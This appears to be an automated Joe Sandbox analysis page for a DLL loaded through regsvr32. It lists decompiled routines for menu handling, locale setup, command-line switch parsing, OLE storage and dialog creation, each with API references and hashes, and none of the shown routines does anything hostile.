Function 1000B587 Relevance: 15.2, APIs: 10, Instructions: 157
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E1000B587(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t88;
				struct HMENU__* _t93;
				int _t94;
				struct HMENU__* _t102;
				int _t107;
				CHAR* _t113;
				signed int* _t118;
				void* _t124;
				signed char _t125;
				struct HMENU__* _t126;
				int _t127;
				signed int _t138;
				signed int* _t141;
				char _t143;
				void* _t144;
				void* _t147;
				CHAR* _t149;
				void* _t151;

				_t149 = _t151 - 0xfc;
				_t88 =  *0x100b9e70; // 0x6fb3f782
				_t149[0x100] = _t88 ^ _t149;
				_push(0x2c);
				E1004764D(0x1008de1d, __ebx, __edi, __esi);
				_t143 = _t149[0x114];
				 *(_t149 - 0x2c) = _t149[0x10c];
				_t93 = _t149[0x110];
				 *(_t149 - 0x24) = _t93;
				 *((intOrPtr*)(_t149 - 0x34)) = 0;
				 *(_t149 - 0x30) = 0;
				_t94 = GetMenuItemCount(_t93);
				 *(_t149 - 0x38) = _t94;
				 *(_t149 - 0x14) = 0;
				 *(_t149 - 0x10) = 0;
				if(_t149[0x118] == 1) {
					 *(_t149 - 0x10) =  *_t143;
				}
				 *(_t149 - 0x18) = 0;
				if(_t94 <= 0) {
					L25:
					 *(_t143 + _t149[0x118] * 4) =  *(_t149 - 0x14);
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t149 - 0xc));
					_pop(_t144);
					_pop(_t147);
					_pop(_t124);
					return E1004763E( *(_t149 - 0x30), _t124, _t149[0x100] ^ _t149, _t141, _t144, _t147);
				}
				do {
					 *(_t149 - 0x1c) = GetSubMenu( *(_t149 - 0x24),  *(_t149 - 0x18));
					_t125 = GetMenuState( *(_t149 - 0x24),  *(_t149 - 0x18), 0x400);
					if( *(_t149 - 0x1c) != 0 || (_t125 & 0x00000800) == 0) {
						__eflags = _t149[0x11c];
						 *(_t149 - 0x28) = 0;
						if(_t149[0x11c] != 0) {
							__eflags = _t149[0x118] - 5;
							if(_t149[0x118] == 5) {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 1;
								if( *((intOrPtr*)(_t143 + 0x14)) == 1) {
									 *(_t149 - 0x28) = GetSubMenu( *(_t149 - 0x2c),  *(_t149 - 0x10));
								}
							}
						}
						_t102 = GetMenuStringA( *(_t149 - 0x24),  *(_t149 - 0x18), _t149, 0x100, 0x400);
						__eflags =  *(_t149 - 0x1c);
						if( *(_t149 - 0x1c) == 0) {
							__eflags = _t102;
							if(_t102 <= 0) {
								goto L23;
							}
							_push(_t149);
							_push(GetMenuItemID( *(_t149 - 0x24),  *(_t149 - 0x18)));
							_t126 = _t125 | 0x00000400;
							__eflags = _t126;
							_push(_t126);
							goto L22;
						} else {
							__eflags =  *(_t149 - 0x28);
							if(__eflags == 0) {
								_t107 = GetMenuItemCount( *(_t149 - 0x1c));
								__eflags = _t107;
								if(_t107 == 0) {
									goto L23;
								}
								_push(_t149);
								_push( *(_t149 - 0x1c));
								_push(_t125 & 0x000000ff | 0x00000410);
								L22:
								InsertMenuA( *(_t149 - 0x2c),  *(_t149 - 0x10), ??, ??, ??);
								 *(_t149 - 0x10) =  *(_t149 - 0x10) + 1;
								_t74 = _t149 - 0x14;
								 *_t74 =  *(_t149 - 0x14) + 1;
								__eflags =  *_t74;
								goto L23;
							}
							_push( *((intOrPtr*)(E1001E302(_t125, _t143, 0x400, __eflags) + 0x10)));
							E1000B543(_t125, _t149 - 0x20, _t143, 0x400, __eflags);
							_t113 =  *(_t149 - 0x20);
							 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
							__eflags =  *(_t113 - 0xc);
							if( *(_t113 - 0xc) != 0) {
								L1000AF0C(_t149 - 0x20, 0x20);
							}
							E1000B029(_t149 - 0x20, _t149);
							_t127 =  *(_t149 - 0x1c);
							AppendMenuA( *(_t149 - 0x28), 0x10, _t127,  *(_t149 - 0x20));
							 *(_t149 - 4) =  *(_t149 - 4) | 0xffffffff;
							_t118 = _t143 + _t149[0x118] * 4;
							 *_t118 =  *_t118 & 0x00000000;
							 *((intOrPtr*)(_t118 - 4)) =  *((intOrPtr*)(_t118 - 4)) + 1;
							 *((intOrPtr*)(_t149 - 0x34)) = 1;
							 *(_t149 - 0x30) = _t127;
							L100013E3( &(( *(_t149 - 0x20))[0xfffffffffffffff0]), _t141);
							goto L23;
						}
					} else {
						_t138 = _t149[0x118];
						_t141 = _t143 + _t138 * 4;
						 *_t141 =  *(_t149 - 0x14);
						 *(_t149 - 0x14) = 0;
						if(_t138 < 5) {
							 *(_t149 - 0x10) =  *(_t149 - 0x10) + _t141[1];
						}
						_t149[0x118] = _t149[0x118] + 2;
					}
					L23:
					 *(_t149 - 0x18) =  *(_t149 - 0x18) + 1;
				} while ( *(_t149 - 0x18) <  *(_t149 - 0x38));
				if( *((intOrPtr*)(_t149 - 0x34)) != 0) {
					goto L26;
				}
				goto L25;
			}

0x1000b58e
0x1000b592
0x1000b599
0x1000b59f
0x1000b5a6
0x1000b5b1
0x1000b5b7
0x1000b5ba
0x1000b5c3
0x1000b5c6
0x1000b5c9
0x1000b5cc
0x1000b5d9
0x1000b5dc
0x1000b5df
0x1000b5e2
0x1000b5e6
0x1000b5e6
0x1000b5eb
0x1000b5ee
0x1000b769
0x1000b772
0x1000b775
0x1000b77b
0x1000b783
0x1000b784
0x1000b785
0x1000b79a
0x1000b79a
0x1000b5f9
0x1000b609
0x1000b615
0x1000b61c
0x1000b64d
0x1000b653
0x1000b656
0x1000b658
0x1000b65f
0x1000b661
0x1000b665
0x1000b673
0x1000b673
0x1000b665
0x1000b65f
0x1000b686
0x1000b68c
0x1000b690
0x1000b72a
0x1000b72c
0x00000000
0x00000000
0x1000b731
0x1000b73e
0x1000b73f
0x1000b73f
0x1000b741
0x00000000
0x1000b696
0x1000b696
0x1000b69a
0x1000b70e
0x1000b714
0x1000b716
0x00000000
0x00000000
0x1000b71b
0x1000b71c
0x1000b727
0x1000b742
0x1000b748
0x1000b74e
0x1000b751
0x1000b751
0x1000b751
0x00000000
0x1000b751
0x1000b6a1
0x1000b6a7
0x1000b6ac
0x1000b6af
0x1000b6b3
0x1000b6b7
0x1000b6be
0x1000b6be
0x1000b6ca
0x1000b6d2
0x1000b6db
0x1000b6ea
0x1000b6ee
0x1000b6f1
0x1000b6f4
0x1000b6fa
0x1000b701
0x1000b704
0x00000000
0x1000b704
0x1000b625
0x1000b625
0x1000b631
0x1000b634
0x1000b636
0x1000b639
0x1000b63e
0x1000b63e
0x1000b641
0x1000b641
0x1000b754
0x1000b754
0x1000b75a
0x1000b767
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1000B5A6
GetMenuItemCount.USER32(?), ref: 1000B5CC
GetSubMenu.USER32 ref: 1000B5FF
GetMenuState.USER32(?,?,00000400), ref: 1000B60F
GetSubMenu.USER32 ref: 1000B66D
GetMenuStringA.USER32 ref: 1000B686
AppendMenuA.USER32(00000000,00000010,00000000,?), ref: 1000B6DB
GetMenuItemCount.USER32(00000000), ref: 1000B70E
GetMenuItemID.USER32(?,?), ref: 1000B738
InsertMenuA.USER32(?,?,00000000,00000000), ref: 1000B748

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Menu$Item$Count$AppendH_prolog3InsertStateString
String ID:
API String ID: 915444591-0
Opcode ID: a4eef6a3f4376d49903b0779fc6422aee06ceab9011746bed295798fb85076cb
Instruction ID: 3f5d256e697bb0ece931bc901f8766a9fbca0fe627d54b4ac24e569dd544017d
Opcode Fuzzy Hash: a4eef6a3f4376d49903b0779fc6422aee06ceab9011746bed295798fb85076cb
Instruction Fuzzy Hash: DE615870D00619EFEF11CFA4CD85AEDBBB5FF08395F10402AE915A62A0D7756A94CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100593ED Relevance: 15.1, APIs: 10, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100593ED(void* __ebx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				intOrPtr _t13;
				intOrPtr _t14;
				void* _t43;
				intOrPtr* _t51;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t51 = E1005496F(8, 1);
					_t58 = _t51;
					if(_t51 != 0) {
						_t13 = E1005496F(0xd8, 1);
						 *_t51 = _t13;
						__eflags = _t13;
						if(__eflags != 0) {
							_t14 = E1005496F(0x220, 1);
							__eflags = _t14;
							 *((intOrPtr*)(_t51 + 4)) = _t14;
							if(__eflags != 0) {
								L10058756( *_t51, 0x100bab30);
								_push(_a4);
								_t48 =  *_t51;
								__eflags = E1005921F(_a8,  *_t51);
								_pop(_t43);
								if(__eflags != 0) {
									__eflags = E10058159(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
									if(__eflags == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										L17:
										return _t51;
									}
									_push( *((intOrPtr*)(_t51 + 4)));
									E100470E9(__ebx, 1, _t51, __eflags);
									_push( *_t51);
									L100586CA();
									E10058504( *_t51);
									_push(_t51);
									E100470E9(__ebx, 1, _t51, __eflags);
									L15:
									_t51 = 0;
									goto L17;
								}
								_push( *_t51);
								L100586CA();
								E10058504( *_t51);
								_push(_t51);
								E100470E9(__ebx, 1, _t51, __eflags);
								goto L15;
							}
							_push( *_t51);
							E100470E9(__ebx, 1, _t51, __eflags);
							_push(_t51);
							E100470E9(__ebx, 1, _t51, __eflags);
							L8:
							goto L3;
						}
						_push(_t51);
						E100470E9(__ebx, 1, _t51, __eflags);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E10049097(_t58))) = 0xc;
					goto L4;
				}
			}

0x100593f4
0x1005941b
0x00000000
0x100593fd
0x10059408
0x1005940a
0x1005940e
0x10059426
0x1005942d
0x1005942f
0x10059431
0x10059442
0x10059447
0x1005944b
0x1005944e
0x10059467
0x1005946c
0x10059474
0x1005947b
0x1005947d
0x1005947e
0x100594a6
0x100594aa
0x100594d2
0x100594d7
0x100594d9
0x00000000
0x100594d9
0x100594ac
0x100594af
0x100594b4
0x100594b6
0x100594bd
0x100594c2
0x100594c3
0x100594cb
0x100594cb
0x00000000
0x100594cb
0x10059480
0x10059482
0x10059489
0x1005948e
0x1005948f
0x00000000
0x10059494
0x10059450
0x10059452
0x10059457
0x10059458
0x10059439
0x00000000
0x10059439
0x10059433
0x10059434
0x00000000
0x10059434
0x10059410
0x10059415
0x00000000
0x10059415

APIs

__calloc_crt.LIBCMT ref: 10059403

Part of subcall function 1005496F: __calloc_impl.LIBCMT ref: 1005497D
Part of subcall function 1005496F: Sleep.KERNEL32(00000000), ref: 10054994

__calloc_crt.LIBCMT ref: 10059426
__calloc_crt.LIBCMT ref: 10059442
__copytlocinfo_nolock.LIBCMT ref: 10059467
__setlocale_nolock.LIBCMT ref: 10059476
___removelocaleref.LIBCMT ref: 10059482
___freetlocinfo.LIBCMT ref: 10059489
__setmbcp_nolock.LIBCMT ref: 100594A1
___removelocaleref.LIBCMT ref: 100594B6
___freetlocinfo.LIBCMT ref: 100594BD

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2969281212-0
Opcode ID: ccc9718630be14401348291a1293bca2cf76700b22a3c32183863ca420a0bef8
Instruction ID: 21b092e1abacb6dd10aba6d3a1ef32e7616c8c6965b8e6eac974718d1555045c
Opcode Fuzzy Hash: ccc9718630be14401348291a1293bca2cf76700b22a3c32183863ca420a0bef8
Instruction Fuzzy Hash: 7621A43D209601EFE721DF24E802D0FB7E4EF82654F21882DF884A2155EF31AC49DB55

Uniqueness

Uniqueness Score: -1.00%

Function 100196B7 Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 87
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100196B7(void* __ecx, CHAR* _a4) {
				int _t11;
				int _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t31;
				void* _t33;
				CHAR* _t34;
				void* _t35;

				_t34 = _a4;
				_t35 = __ecx;
				_t11 = lstrcmpA(_t34, "pt");
				if(_t11 == 0) {
					 *((intOrPtr*)(_t35 + 0x10)) = 3;
					return _t11;
				}
				_t12 = lstrcmpA(_t34, "p");
				if(_t12 == 0) {
					 *((intOrPtr*)(_t35 + 0x10)) = 2;
					return _t12;
				}
				_t13 = L1001286D(_t34, "Register");
				if(_t13 == 0) {
					L16:
					 *((intOrPtr*)(_t35 + 0x10)) = 5;
					return _t13;
				}
				_t13 = L1001286D(_t34, "Regserver");
				if(_t13 == 0) {
					goto L16;
				}
				_t14 = L1001286D(_t34, "Unregister");
				if(_t14 == 0) {
					L15:
					 *((intOrPtr*)(_t35 + 0x10)) = 6;
					return _t14;
				}
				_t14 = L1001286D(_t34, "Unregserver");
				_pop(_t29);
				if(_t14 == 0) {
					goto L15;
				}
				if(lstrcmpA(_t34, "dde") == 0) {
					_t19 = E10022019(_t29, _t15);
					 *((intOrPtr*)(_t35 + 0x10)) = 4;
					return _t19;
				}
				_t16 = L1001286D(_t34, "Embedding");
				_pop(_t31);
				if(_t16 == 0) {
					_t18 = E10022019(_t31, _t16);
					 *((intOrPtr*)(_t35 + 8)) = 1;
					L12:
					 *(_t35 + 4) =  *(_t35 + 4) & 0x00000000;
					return _t18;
				}
				_t17 = L1001286D(_t34, "Automation");
				_pop(_t33);
				if(_t17 == 0) {
					_t18 = E10022019(_t33, _t17);
					 *((intOrPtr*)(_t35 + 0xc)) = 1;
					goto L12;
				}
				return _t17;
			}

0x100196c0
0x100196ca
0x100196cc
0x100196d0
0x100196d2
0x00000000
0x100196d2
0x100196e4
0x100196e8
0x100196ea
0x00000000
0x100196ea
0x100196fc
0x10019705
0x100197aa
0x100197aa
0x00000000
0x100197aa
0x10019711
0x1001971a
0x00000000
0x00000000
0x10019726
0x1001972f
0x100197a1
0x100197a1
0x00000000
0x100197a1
0x10019737
0x1001973f
0x10019740
0x00000000
0x00000000
0x1001974c
0x1001974f
0x10019754
0x00000000
0x10019754
0x10019763
0x1001976b
0x1001976c
0x1001976f
0x10019774
0x1001977b
0x1001977b
0x00000000
0x1001977b
0x10019787
0x1001978f
0x10019790
0x10019793
0x10019798
0x00000000
0x10019798
0x100197b4

APIs

lstrcmpA.KERNEL32(?,1009C800), ref: 100196CC
lstrcmpA.KERNEL32(?,1009C7FC), ref: 100196E4

Strings

Regserver, xrefs: 1001970B
Automation, xrefs: 10019781
Embedding, xrefs: 1001975D
Unregserver, xrefs: 10019731
Unregister, xrefs: 10019720
Register, xrefs: 100196F6
dde, xrefs: 10019742

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: lstrcmp
String ID: Automation$Embedding$Register$Regserver$Unregister$Unregserver$dde
API String ID: 1534048567-1547061805
Opcode ID: 60573c7528be058affa71ce0b378e8f877830fb0de34cc76e3df0a0d133389b0
Instruction ID: 79a62cdd177f1b5dfa4b217553fad06d89059955d199f48fdbc3c6dc5129af43
Opcode Fuzzy Hash: 60573c7528be058affa71ce0b378e8f877830fb0de34cc76e3df0a0d133389b0
Instruction Fuzzy Hash: BD21B47641C702AAF624DEF2ACC5F6BA2ECEF41359F20041EF906AA0C1EF75E4D56611

Uniqueness

Uniqueness Score: -1.00%

Function 1000A3F7 Relevance: 15.1, APIs: 10, Instructions: 82comCOMMON

Download Yara Rule

APIs

ReadClassStg.OLE32(?,?), ref: 1000A415
ReadFmtUserTypeStg.OLE32(?,?,?), ref: 1000A431
OleRegGetUserType.OLE32(?,00000001,?), ref: 1000A444
WriteClassStg.OLE32(?,?), ref: 1000A45C
WriteFmtUserTypeStg.OLE32(?,?,?), ref: 1000A472
SetConvertStg.OLE32(?,00000001), ref: 1000A47E
WriteClassStg.OLE32(?,?), ref: 1000A490
WriteFmtUserTypeStg.OLE32(?,?,?), ref: 1000A499
CoTaskMemFree.OLE32(?), ref: 1000A4AC
CoTaskMemFree.OLE32(?), ref: 1000A4B1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: TypeUserWrite$Class$FreeReadTask$Convert
String ID:
API String ID: 2659014025-0
Opcode ID: 1e346744f23a1ae00a927adf964772df9ce929b9dd4d2651f53c700e99dacc8b
Instruction ID: 441097951dd2468e5e3aeabd33f44de0db15768635f554f72f32f7408884e4a5
Opcode Fuzzy Hash: 1e346744f23a1ae00a927adf964772df9ce929b9dd4d2651f53c700e99dacc8b
Instruction Fuzzy Hash: CA21F77590012EAFEF01DFA5CD849EEBBF9FF4A290F550166E500F2110DB759A46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001BC23 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1001BC23(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E10047680(0x1008f034, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1001E302(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1001E302(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E100172B0(_t103, _t104, 0, _t129, _t136, 0x10);
				E100172B0(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E10047725(_t65);
					}
					L1000140B(_t132 - 0x1c, E100184C0());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = L1002A6E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x100bdccc; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1001628E(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1001B5C0, 0);
							L100013E3( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E10014092(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E1002A662(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E1002A5C0(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E1002A0EA(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E1002A0DC(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E1001BBE2(_t103, _t132 - 0x1c, _t124, 0, _t130, _t132, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

0x1001bc23
0x1001bc23
0x1001bc23
0x1001bc23
0x1001bc2a
0x1001bc2f
0x1001bc31
0x1001bc36
0x1001bc39
0x1001bc43
0x1001bc43
0x1001bc4b
0x1001bc50
0x1001bc53
0x1001bc56
0x1001bc59
0x1001bc63
0x1001bc6a
0x1001bc97
0x1001bc9a
0x1001bc9a
0x1001bc9c
0x1001bc7e
0x1001bc7e
0x1001be0b
0x1001be10
0x1001be10
0x1001bca7
0x1001bcb5
0x1001bcb9
0x1001bcc6
0x1001bccb
0x1001bcd1
0x1001bcd3
0x1001bd09
0x1001bd09
0x1001bd0b
0x1001bd4c
0x1001bd4c
0x1001bd50
0x1001bd55
0x1001bd5a
0x1001bd5d
0x1001bd5f
0x1001bd65
0x1001bd61
0x1001bd61
0x1001bd61
0x1001bd7f
0x1001bd81
0x1001bd86
0x1001bda8
0x1001bdab
0x1001bdad
0x1001bdb5
0x1001bdb8
0x1001bdba
0x1001bdc1
0x1001bdc1
0x1001bdba
0x1001bdc7
0x1001bdcc
0x1001bdce
0x1001bdd4
0x1001bdd4
0x1001bdda
0x1001bddc
0x1001bdde
0x1001bde2
0x1001bde5
0x1001bdeb
0x1001bdeb
0x1001bdeb
0x1001bde2
0x1001bded
0x1001bdf0
0x1001bdf5
0x1001bdfe
0x1001bdfe
0x1001be06
0x1001be08
0x1001be08
0x1001be08
0x00000000
0x1001be08
0x1001bd0d
0x1001bd11
0x1001bd1c
0x1001bd20
0x1001bd30
0x1001bd33
0x1001bd37
0x1001bd3c
0x1001bd3f
0x1001bd4a
0x1001bd4a
0x00000000
0x1001bd3f
0x1001bcd5
0x1001bcd7
0x00000000
0x00000000
0x1001bce1
0x1001bce3
0x00000000
0x00000000
0x1001bced
0x1001bcf4
0x1001bcf9
0x1001bcfb
0x1001bcfd
0x00000000
0x00000000
0x1001bcff
0x1001bd04
0x1001bd06
0x1001bd06
0x00000000
0x1001bd04
0x1001bc71
0x1001bc7c
0x1001bc93
0x00000000
0x1001bc93
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 1001BC2A
GetSystemMetrics.USER32 ref: 1001BCDB
GlobalLock.KERNEL32 ref: 1001BD44
CreateDialogIndirectParamA.USER32(?,?,?,1001B5C0,00000000), ref: 1001BD73

Strings

MS Shell Dlg, xrefs: 1001BCE5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
